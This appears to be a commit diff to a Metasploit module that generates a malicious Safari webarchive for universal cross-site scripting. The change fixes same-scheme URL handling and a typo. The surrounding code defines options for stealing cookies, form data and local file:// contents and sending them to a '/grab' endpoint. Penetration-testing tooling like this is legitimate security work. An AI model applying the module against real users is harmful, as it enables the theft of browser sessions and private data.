Land #4590, jvennix-r7's fix for same-scheme URLs

made a trivial string formatting tweak
2015-01-16 09:08:44 -06:00 · 2015-01-16 09:08:44 -06:00 · 6a68888712
parent c1e604f201 7ef721bdd6
commit 6a68888712
1 changed files with 6 additions and 3 deletions
--- a/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
+++ b/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
@ -47,9 +47,9 @@ class Metasploit3 < Msf::Auxiliary
    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.webarchive']),
-        OptString.new('URLS', [ true, 'A space-delimited list of URLs to UXSS (eg http://browserscan.rapid7.com/']),
+        OptString.new('URLS', [ true, 'A space-delimited list of URLs to UXSS (eg http://rapid7.com http://example.com']),
        OptString.new('URIPATH', [false, 'The URI to receive the UXSS\'ed data', '/grab']),
-        OptString.new('DOWNLOAD_PATH', [ true, 'The path to download the webarhive.', '/msf.webarchive']),
+        OptString.new('DOWNLOAD_PATH', [ true, 'The path to download the webarchive.', '/msf.webarchive']),
        OptString.new('URLS', [ true, 'The URLs to steal cookie and form data from.', '']),
        OptString.new('FILE_URLS', [false, 'Additional file:// URLs to steal.', '']),
        OptBool.new('STEAL_COOKIES', [true, "Enable cookie stealing.", true]),
@ -768,8 +768,11 @@ class Metasploit3 < Msf::Auxiliary
            if script_uri.relative?
              url = page_uri + url
            end
+            if url.to_s.starts_with? '//'
+              url = "#{page_uri.scheme}:#{url}"
+            end
            io = open(url)
-          rescue URI::InvalidURIError => e
+          rescue URI::InvalidURIError, OpenURI::HTTPError
            next
          end